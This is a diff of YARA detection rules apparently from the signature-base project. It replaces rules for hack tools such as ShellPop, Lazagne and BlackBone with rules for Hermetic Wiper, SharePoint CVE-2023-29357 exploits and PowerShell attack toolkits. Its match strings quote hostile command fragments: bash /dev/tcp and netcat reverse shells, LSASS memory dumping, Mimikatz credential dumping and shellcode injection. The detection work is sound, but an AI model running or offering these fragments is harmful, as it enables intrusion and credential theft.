+		hash4 = "1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591"
 
 	strings:
-		$x1 = "if [ -e /tmp/f ]; then rm /tmp/f;" ascii
-		$x2 = "0</tmp/f|/bin/bash 1>/tmp/f" fullword ascii
+		$xc1 = { 00 5C 00 5C 00 2E 00 5C 00 50 00 68 00 79 00 73
+               00 69 00 63 00 61 00 6C 00 44 00 72 00 69 00 76
+               00 65 00 25 00 75 00 00 00 5C 00 5C 00 2E 00 5C
+               00 45 00 50 00 4D 00 4E 00 54 00 44 00 52 00 56
+               00 5C 00 25 00 75 00 00 00 5C 00 5C 00 2E 00 5C
+               00 00 00 00 00 25 00 73 00 25 00 2E 00 32 00 73
+               00 00 00 00 00 24 00 42 00 69 00 74 00 6D 00 61
+               00 70 00 00 00 24 00 4C 00 6F 00 67 00 46 00 69
+               00 6C 00 65 }
+		$sc1 = { 00 44 00 72 00 69 00 76 00 65 00 72 00 73 00 00
+               00 64 00 72 00 76 00 00 00 53 00 79 00 73 00 74
+               00 65 00 6D 00 33 00 32 }
+		$s1 = "\\\\?\\C:\\Windows\\System32\\winevt\\Logs" wide fullword
+		$s2 = "\\\\.\\EPMNTDRV\\%u" wide fullword
+		$s3 = "DRV_XP_X64" wide fullword
+		$s4 = "%ws%.2ws" wide fullword
+		$op1 = { 8b 7e 08 0f 57 c0 8b 46 0c 83 ef 01 66 0f 13 44 24 20 83 d8 00 89 44 24 18 0f 88 3b 01 00 00 }
+		$op2 = { 13 fa 8b 55 f4 4e 3b f3 7f e6 8a 45 0f 01 4d f0 0f 57 c0 }
 
 	condition:
-		filesize < 3KB and 1 of them
+		( uint16( 0 ) == 0x5a53 or uint16( 0 ) == 0x5a4d ) and filesize < 400KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_SUSP_Shellpop_Bash
+rule SIGNATURE_BASE_APT_UA_Hermetic_Wiper_Artefacts_Feb22_1
 {
 	meta:
-		description = "Detects susupicious bash command"
-		author = "Tobias Michalski"
-		id = "771b7d01-272a-5986-af07-7417b84c52ed"
-		date = "2018-05-18"
-		modified = "2025-04-11"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4399-L4416"
+		description = "Detects artefacts found in Hermetic Wiper malware related intrusions"
+		author = "Florian Roth (Nextron Systems)"
+		id = "77f793c1-b02c-59c3-b3e4-75758f5b3b8d"
+		date = "2022-02-25"
+		modified = "2023-12-05"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_hermetic_wiper.yar#L40-L70"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a557822eaaad84897acc32935f7545deb17ea3b8c6e34acd0ac5ef9fad08cb1e"
-		score = 70
+		logic_hash = "5e917618a5172c68b4b32ba9e63402c2a98ccb027276b317ec169a4fef219de1"
+		score = 75
 		quality = 85
 		tags = ""
-		hash1 = "36fad575a8bc459d0c2e3ad626e97d5cf4f5f8bedc56b3cc27dd2f7d88ed889b"
 
 	strings:
-		$x1 = "bash -i >& /dev/tcp/" ascii
-		$x2 = "bash -i >& /dev/tcp/" ascii base64
-		$fp1 = "bash -i >& /dev/tcp/IP/PORT" ascii
+		$sx1 = "/c powershell -c \"rundll32 C:\\windows\\system32\\comsvcs.dll MiniDump" ascii wide
+		$sx2 = "appdata\\local\\microsoft\\windows\\winupd.log" ascii wide
+		$sx3 = "AppData\\Local\\Microsoft\\Windows\\Winupd.log" ascii wide
+		$sx4 = "CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1" ascii wide
+		$sx5 = "\\policydefinitions\\postgresql.exe" ascii wide
+		$sx6 = "powershell -v 2 -exec bypass -File text.ps1" ascii wide
+		$sx7 = "powershell -exec bypass gp.ps1" ascii wide
+		$sx8 = "powershell -exec bypass -File link.ps1" ascii wide
+		$sx9 = " 1> \\\\127.0.0.1\\ADMIN$\\__16" ascii wide
+		$sa1 = "(New-Object System.Net.WebClient).DownloadFile(" ascii wide
+		$sa2 = "CSIDL_SYSTEM_DRIVE\\temp\\" ascii wide
+		$sa3 = "1> \\\\127.0.0.1\\ADMIN$" ascii wide
+		$fp1 = "<html" ascii
 
 	condition:
-		1 of ( $x* ) and not 1 of ( $fp* )
+		1 of ( $sx* ) or all of ( $sa* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Netcat : FILE
+rule SIGNATURE_BASE_APT_UA_Hermetic_Wiper_Scheduled_Task_Feb22_1
 {
 	meta:
-		description = "Detects suspcious netcat shellpop"
-		author = "Tobias Michalski"
-		id = "cd55e912-b57b-5fce-98eb-5a0cd27a6e4d"
-		date = "2018-05-18"
-		modified = "2025-04-14"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4418-L4433"
+		description = "Detects scheduled task pattern found in Hermetic Wiper malware related intrusions"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a628f773-9c71-5979-a4db-37b6b6bd6a56"
+		date = "2022-02-25"
+		modified = "2023-12-05"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_hermetic_wiper.yar#L72-L88"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2c61da27d4bc455a9f2555fcc1c5cce7cead226a5900eeed1aaf622616051b79"
-		score = 75
+		logic_hash = "56368ba1c97fe3455312b6ee86dcd1a21677f7dfa3836e76ada4b236a5b2c171"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		hash1 = "98e3324f4c096bb1e5533114249a9e5c43c7913afa3070488b16d5b209e015ee"
+		tags = ""
 
 	strings:
-		$s1 = "if [ -e /tmp/f ]; then rm /tmp/f;" ascii
-		$s2 = "fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc" ascii
-		$s4 = "mknod /tmp/f p && nc" ascii
-		$s5 = "</tmp/f|/bin/bash 1>/tmp/f" ascii
+		$a0 = "<Task version=" ascii wide
+		$sa1 = "CSIDL_SYSTEM_DRIVE\\temp" ascii wide
+		$sa2 = "postgresql.exe 1> \\\\127.0.0.1\\ADMIN$" ascii wide
+		$sa3 = "cmd.exe /Q /c move CSIDL_SYSTEM_DRIVE" ascii wide
 
 	condition:
-		filesize < 2KB and 1 of them
+		$a0 and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_HKTL_Berootexe : FILE
+rule SIGNATURE_BASE_LOG_EXPL_Sharepoint_CVE_2023_29357_Sep23_1 : CVE_2023_29357
 {
 	meta:
-		description = "Detects beRoot.exe which checks common Windows missconfigurations"
-		author = "yarGen Rule Generator"
-		id = "b91c2e0b-2e47-5339-bf48-eaa8329ea63b"
-		date = "2018-07-25"
-		modified = "2025-04-14"
-		reference = "https://github.com/AlessandroZ/BeRoot/tree/master/Windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4436-L4452"
+		description = "Detects log entries that could indicate a successful exploitation of CVE-2023-29357 on Microsoft SharePoint servers with the published Python POC"
+		author = "Florian Roth (with help from @LuemmelSec)"
+		id = "9fa77216-c0d6-55e5-bbcc-adb9438ca456"
+		date = "2023-09-28"
+		modified = "2023-10-01"
+		reference = "https://twitter.com/Gi7w0rm/status/1706764212704591953?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_sharepoint_cve_2023_29357.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8e10fddd3b3eb5e5200d9ed0bcb23961d196d9e1de03ebf03a96374ee02a9097"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		hash1 = "865b3b8ec9d03d3475286c3030958d90fc72b21b0dca38e5bf8e236602136dd7"
+		logic_hash = "03e3a4715c8683dc8d03ad6720c1c9b40482bd0bfa3020aa1152565ec9ec929f"
+		score = 70
+		quality = 60
+		tags = "CVE-2023-29357"
 
 	strings:
-		$s1 = "checks.webclient.secretsdump(" ascii
-		$s2 = "beroot.modules" fullword ascii
-		$s3 = "beRoot.exe.manifest" fullword ascii
+		$xr1 = /GET [a-z\.\/_]{0,40}\/web\/(siteusers|currentuser) - (80|443) .{10,200} (python-requests\/[0-9\.]{3,8}|-) [^ ]{1,160} [^4]0[0-9] /
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 18000KB and 1 of them )
+		$xr1
 }
-rule SIGNATURE_BASE_HKTL_Berootexe_Output : FILE
+rule SIGNATURE_BASE_HKTL_EXPL_POC_PY_Sharepoint_CVE_2023_29357_Sep23_1 : CVE_2023_29357 FILE
 {
 	meta:
-		description = "Detects the output of beRoot.exe"
-		author = "Tobias Michalski"
-		id = "dfd11915-443f-5ce9-b94a-bdcb0e62104e"
-		date = "2018-07-25"
-		modified = "2025-04-14"
-		reference = "https://github.com/AlessandroZ/BeRoot/tree/master/Windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4454-L4468"
+		description = "Detects a Python POC to exploit CVE-2023-29357 on Microsoft SharePoint servers"
+		author = "Florian Roth"
+		id = "2be524ab-f360-56b8-9ce3-e15036855c67"
+		date = "2023-10-01"
+		modified = "2023-10-01"
+		reference = "https://github.com/Chocapikk/CVE-2023-29357"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_sharepoint_cve_2023_29357.yar#L22-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7886535d071092df76507f0dd431409e85c368d404f49e7f118278f6565618e6"
-		score = 75
+		logic_hash = "fec7762ab23ba5ee9e793000d080b1d64b93157c6ead9e6939ccfb3c168dd360"
+		score = 80
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2023-29357, FILE"
 
 	strings:
-		$s1 = "permissions: {'change_config'" fullword wide
-		$s2 = "Full path: C:\\Windows\\system32\\msiexec.exe /V" fullword wide
-		$s3 = "Full path: C:\\Windows\\system32\\svchost.exe -k DevicesFlow" fullword wide
-		$s4 = "! BANG BANG !" fullword wide
+		$x1 = "encoded_payload = base64.urlsafe_b64encode(json.dumps(payload).encode()).rstrip(b'=')"
 
 	condition:
-		filesize < 400KB and 3 of them
+		filesize < 30KB and $x1
 }
-rule SIGNATURE_BASE_HKTL_Embeddedpdf : FILE
+rule SIGNATURE_BASE_HKTL_EXPL_POC_NET_Sharepoint_CVE_2023_29357_Sep23_1 : CVE_2023_29357 FILE
 {
 	meta:
-		description = "Detects Embedded PDFs which can start malicious content"
-		author = "Tobias Michalski"
-		id = "d4e2d878-fb75-54c5-9879-fe94102911d1"
-		date = "2018-07-25"
-		modified = "2025-04-14"
-		reference = "https://twitter.com/infosecn1nja/status/1021399595899731968?s=12"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4470-L4487"
+		description = "Detects a C# POC to exploit CVE-2023-29357 on Microsoft SharePoint servers"
+		author = "Florian Roth"
+		id = "aa6aeb00-b162-538c-a670-cbff525dd8f1"
+		date = "2023-10-01"
+		modified = "2023-12-05"
+		reference = "https://github.com/LuemmelSec/CVE-2023-29357"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_sharepoint_cve_2023_29357.yar#L37-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "041580406e2a7c644d713d8fbf7fccb81664ff536e62df26b3c0f331409fb993"
-		score = 75
+		logic_hash = "cf621cc9c5074f531df61623b09db68478e94ae6a9a7acc26aa8d9dde79bd30c"
+		score = 80
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2023-29357, FILE"
 
 	strings:
-		$x1 = "/Type /Action\n /S /JavaScript\n /JS (this.exportDataObject({" fullword ascii
-		$s1 = "(This PDF document embeds file" fullword ascii
-		$s2 = "/Names << /EmbeddedFiles << /Names" fullword ascii
-		$s3 = "/Type /EmbeddedFile" fullword ascii
+		$x1 = "{f22d2de0-606b-4d16-98d5-421f3f1ba8bc}" ascii wide
+		$x2 = "{F22D2DE0-606B-4D16-98D5-421F3F1BA8BC}" ascii wide
+		$s1 = "Bearer"
+		$s2 = "hashedprooftoken"
+		$s3 = "/_api/web/"
+		$s4 = "X-PROOF_TOKEN"
+		$s5 = "00000003-0000-0ff1-ce00-000000000000"
+		$s6 = "IsSiteAdmin"
 
 	condition:
-		uint16( 0 ) == 0x5025 and 2 of ( $s* ) and $x1
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( 1 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_HTKL_Blackbone_Driverinjector : FILE
+rule SIGNATURE_BASE_Ce_Enfal_Cmstar_Debug_Msg : FILE
 {
 	meta:
-		description = "Detects BlackBone Driver injector"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0d992a6c-c57a-5895-af0d-9c167d922601"
-		date = "2018-09-11"
-		modified = "2025-04-14"
-		reference = "https://github.com/DarthTon/Blackbone"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4489-L4515"
+		description = "Detects the static debug strings within CMSTAR"
+		author = "rfalcone"
+		id = "2c483f20-4fa8-5246-9dcb-8868db64b6e3"
+		date = "2015-05-10"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/JucrP9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cmstar.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d6a5f02a465ea46892e1de54a3482aace387ab0d2cdb949e263ce63f4f9edbb7"
-		score = 60
+		hash = "9b9cc7e2a2481b0472721e6b87f1eba4faf2d419d1e2c115a91ab7e7e6fc7f7c"
+		logic_hash = "31251b7ce33eb561aeb7405514df83dc1e00fdf184e3deeaa48505407d9567a0"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "8062a4284c719412270614458150cb4abbdf77b2fc35f770ce9c45d10ccb1f4d"
-		hash2 = "2d2fc27200c22442ac03e2f454b6e1f90f2bbc17017f05b09f7824fac6beb14b"
-		hash3 = "e45da157483232d9c9c72f44b13fca2a0d268393044db00104cc1afe184ca8d1"
 
 	strings:
-		$s1 = "=INITtH=PAGEtA" fullword ascii
-		$s2 = "BBInjectDll" fullword ascii
-		$s3 = "LdrLoadDll" fullword ascii
-		$s4 = "\\??\\pipe\\%ls" fullword wide
-		$s5 = "Failed to retrieve Kernel base address. Aborting" fullword ascii
-		$x2 = "BlackBone: %s: APC injection failed with status 0x%X" fullword ascii
-		$x3 = "BlackBone: PDE_BASE/PTE_BASE not found " fullword ascii
-		$x4 = "%s: Invalid injection type specified - %d" fullword ascii
-		$x6 = "Trying to map C:\\windows\\system32\\cmd.exe into current process" fullword wide
-		$x7 = "\\BlackBoneDrv\\bin\\" ascii
-		$x8 = "DosDevices\\BlackBone" wide
+		$d1 = "EEE\x0d\x0a" fullword
+		$d2 = "TKE\x0d\x0a" fullword
+		$d3 = "VPE\x0d\x0a" fullword
+		$d4 = "VPS\x0d\x0a" fullword
+		$d5 = "WFSE\x0d\x0a" fullword
+		$d6 = "WFSS\x0d\x0a" fullword
+		$d7 = "CM**\x0d\x0a" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8000KB and ( 3 of them or 1 of ( $x* ) )
+		uint16( 0 ) == 0x5a4d and all of ( $d* )
 }
-rule SIGNATURE_BASE_HKTL_Sqlmap : FILE
+rule SIGNATURE_BASE_Ps1_Toolkit_Powerup : FILE
 {
 	meta:
-		description = "Detects sqlmap hacktool"
+		description = "Auto-generated rule - file PowerUp.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "da2029dd-c4ce-557f-a409-c468fa3deef3"
-		date = "2018-10-09"
-		modified = "2025-04-14"
-		reference = "https://github.com/sqlmapproject/sqlmap"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4517-L4530"
+		id = "ff3eeec3-602d-5824-8a50-aed2081f49bc"
+		date = "2016-09-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L10-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9aa13bc2db40f5ab3debd617c84b1e11805d137bc55e9088bc9a0c23e185dfce"
-		score = 75
+		logic_hash = "64562c623de89df59d15db48990c25886c67b79ac9341cf8f21ef372057ccd85"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "9444478b03caf7af853a64696dd70083bfe67f76aa08a16a151c00aadb540fa8"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fc65ec85dbcd49001e6037de9134086dd5559ac41ac4d1adf7cab319546758ad"
 
 	strings:
-		$x1 = "if cmdLineOptions.get(\"sqlmapShell\"):" fullword ascii
-		$x2 = "if conf.get(\"dumper\"):" fullword ascii
+		$s1 = "iex \"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe list vdir /text:vdir.name\" | % { " fullword ascii
+		$s2 = "iex \"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe list apppools /text:name\" | % { " fullword ascii
+		$s3 = "if ($Env:PROCESSOR_ARCHITECTURE -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBNAEQANgA0AA==')))) {" fullword ascii
+		$s4 = "C:\\Windows\\System32\\InetSRV\\appcmd.exe list vdir /text:physicalpath | " fullword ascii
+		$s5 = "if (Test-Path  (\"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe\"))" fullword ascii
+		$s6 = "if (Test-Path  (\"$Env:SystemRoot\\System32\\InetSRV\\appcmd.exe\")) {" fullword ascii
+		$s7 = "Write-Verbose \"Executing command '$Cmd'\"" fullword ascii
+		$s8 = "Write-Warning \"[!] Target service" fullword ascii
 
 	condition:
-		filesize < 50KB and 1 of them
+		( uint16( 0 ) == 0xbbef and filesize < 4000KB and 1 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_Sqlmap_Backdoor : FILE
+rule SIGNATURE_BASE_Ps1_Toolkit_Inveigh_Bruteforce : FILE
 {
 	meta:
-		description = "Detects SqlMap backdoors"
+		description = "Auto-generated rule - file Inveigh-BruteForce.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bf09caac-cf15-5936-b5b4-df4f28788961"
-		date = "2018-10-09"
-		modified = "2025-04-14"
-		reference = "https://github.com/sqlmapproject/sqlmap"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4532-L4548"
+		id = "cdc298d3-f9ac-5472-bdc9-0dc51ad91e4a"
+		date = "2016-09-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L33-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5e09135e3908442d873511b7b75c8475b2345a28f3bad41a242d6fc5a3b7c002"
-		score = 75
+		logic_hash = "b23b6ad66e054e435415464262004ead6e7ee121185d76c02110506293b3867b"
+		score = 80
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a2ae1e02bcb977cd003374f551ed32218dbcba3120124e369cc150b9a63fe3b8"
+
+	strings:
+		$s1 = "Import-Module .\\Inveigh.psd1;Invoke-InveighBruteForce -SpooferTarget 192.168.1.11 " fullword ascii
+		$s2 = "$(Get-Date -format 's') - Attempting to stop HTTP listener\")|Out-Null" fullword ascii
+		$s3 = "Invoke-InveighBruteForce -SpooferTarget 192.168.1.11 -Hostname server1" fullword ascii
 
 	condition:
-		( uint32( 0 ) == 0x8e859c07 or uint32( 0 ) == 0x2d859c07 or uint32( 0 ) == 0x92959c07 or uint32( 0 ) == 0x929d9c07 or uint32( 0 ) == 0x29959c07 or uint32( 0 ) == 0x2b8d9c07 or uint32( 0 ) == 0x2b859c07 or uint32( 0 ) == 0x28b59c07 ) and filesize < 2KB
+		( uint16( 0 ) == 0xbbef and filesize < 300KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_Lazagne_Passworddumper_Dec18_1 : FILE
+rule SIGNATURE_BASE_Ps1_Toolkit_Invoke_Shellcode : FILE
 {
 	meta:
-		description = "Detects password dumper Lazagne often used by middle eastern threat groups"
+		description = "Auto-generated rule - file Invoke-Shellcode.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bae48a4d-33b6-55b9-abf5-daf87e5da9e9"
-		date = "2018-12-11"
-		modified = "2025-04-14"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4550-L4570"
+		id = "193d64b6-ffba-55fb-ab95-9c78552b8d68"
+		date = "2016-09-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L51-L69"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "887c8e91942076395dc7575d5cbd926e7e0971a759daf719983dd918d9babad3"
-		score = 85
+		logic_hash = "03e9a8c5e45781d73fd13c331d82802a18e4255b506e896019d6f08c5a67dedf"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1205f5845035e3ee30f5a1ced5500d8345246ef4900bcb4ba67ef72c0f79966c"
-		hash2 = "884e991d2066163e02472ea82d89b64e252537b28c58ad57d9d648b969de6a63"
-		hash3 = "bf8f30031769aa880cdbe22bc0be32691d9f7913af75a5b68f8426d4f0c7be50"
+		hash1 = "24abe9f3f366a3d269f8681be80c99504dea51e50318d83ee42f9a4c7435999a"
 
 	strings:
-		$s1 = "softwares.opera(" ascii
-		$s2 = "softwares.mozilla(" ascii
-		$s3 = "config.dico(" ascii
-		$s4 = "softwares.chrome(" ascii
-		$s5 = "softwares.outlook(" ascii
+		$s1 = "Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii
+		$s2 = "Get-ProcAddress kernel32.dll OpenProcess" fullword ascii
+		$s3 = "msfpayload windows/exec CMD=\"cmd /k calc\" EXITFUNC=thread C | sed '1,6d;s/[\";]//g;s/\\\\/,0/g' | tr -d '\\n' | cut -c2- " fullword ascii
+		$s4 = "inject shellcode into" ascii
+		$s5 = "Injecting shellcode" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 17000KB and 1 of them
+		( uint16( 0 ) == 0xbbef and filesize < 90KB and 1 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_Lazagne_Gen_18
+rule SIGNATURE_BASE_Ps1_Toolkit_Invoke_Mimikatz : FILE
 {
 	meta:
-		description = "Detects Lazagne password extractor hacktool"
+		description = "Auto-generated rule - file Invoke-Mimikatz.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "034ea6d8-f5cf-5664-9ff9-24d19403093d"
-		date = "2018-12-11"
-		modified = "2025-04-14"
-		reference = "https://creativecommons.org/licenses/by-nc/4.0/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4572-L4589"
+		id = "7c0252a1-fbe4-5519-949b-285073abb21f"
+		date = "2016-09-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L71-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6f3e895080267a551a3b7a0ba2d4207b31befacbd35d1e6941e1b69d7e2689ce"
+		logic_hash = "0bca6245befb5183f6a45406823c45267b0a31fb0d4505606b98025f6494f2cc"
 		score = 80
 		quality = 85
-		tags = ""
-		hash1 = "51121dd5fbdfe8db7d3a5311e3e9c904d644ff7221b60284c03347938577eecf"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5c31a2e3887662467cfcb0ac37e681f1d9b0f135e6dfff010aae26587e03d8c8"
 
 	strings:
-		$x1 = "lazagne.config.powershell_execute(" ascii
-		$x2 = "creddump7.win32." ascii
-		$x3 = "lazagne.softwares.windows.hashdump" ascii
-		$x4 = ".softwares.memory.libkeepass.common(" ascii
+		$s1 = "Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii
+		$s2 = "ps | where { $_.Name -eq $ProcName } | select ProcessName, Id, SessionId" fullword ascii
+		$s3 = "privilege::debug exit" ascii
+		$s4 = "Get-ProcAddress Advapi32.dll AdjustTokenPrivileges" fullword ascii
+		$s5 = "Invoke-Mimikatz -DumpCreds" fullword ascii
+		$s6 = "| Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002" fullword ascii
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0xbbef and filesize < 10000KB and 1 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_Nopowershell
+rule SIGNATURE_BASE_Ps1_Toolkit_Invoke_Relfectivepeinjection : FILE
 {
 	meta:
-		description = "Detects NoPowerShell hack tool"
+		description = "Auto-generated rule - file Invoke-RelfectivePEInjection.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "17d508d5-833f-5232-a071-dbed8758493b"
-		date = "2018-12-28"
-		modified = "2022-12-21"
-		reference = "https://github.com/bitsadmin/nopowershell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4591-L4608"
+		id = "75ceb01e-103f-55b2-8362-42d22a35a36a"
+		date = "2016-09-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L92-L111"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2207af9fcc61d547dfeff347a1eae2c59024a7270d1b8cbb7abef56d80864728"
-		score = 75
+		logic_hash = "910b8b1dbc7306369f90eae0dfd5949347b2c41fa0eb5f590aed8e90e8db199a"
+		score = 80
 		quality = 85
-		tags = ""
-		hash1 = "2dad091dd00625762a7590ce16c3492cbaeb756ad0e31352a42751deb7cf9e70"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "510b345f821f93c1df5f90ac89ad91fcd0f287ebdabec6c662b716ec9fddb03a"
 
 	strings:
-		$x1 = "\\NoPowerShell.pdb" ascii
-		$x2 = "Invoke-WmiMethod -Class Win32_Process -Name Create \"cmd" fullword wide
-		$x3 = "ls C:\\Windows\\System32 -Include *.exe | select -First 10 Name,Length" fullword wide
-		$x4 = "ls -Recurse -Force C:\\Users\\ -Include *.kdbx" fullword wide
-		$x5 = "NoPowerShell.exe" fullword wide
+		$x1 = "Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt)" fullword ascii
+		$x2 = "Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local" fullword ascii
+		$x3 = "} = Get-ProcAddress Advapi32.dll OpenThreadToken" ascii
+		$x4 = "Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local" fullword ascii
+		$s5 = "$PEBytes = [IO.File]::ReadAllBytes('DemoDLL_RemoteProcess.dll')" fullword ascii
+		$s6 = "= Get-ProcAddress Advapi32.dll AdjustTokenPrivileges" ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0xbbef and filesize < 700KB and 2 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_HKTL_Htran_Go : FILE
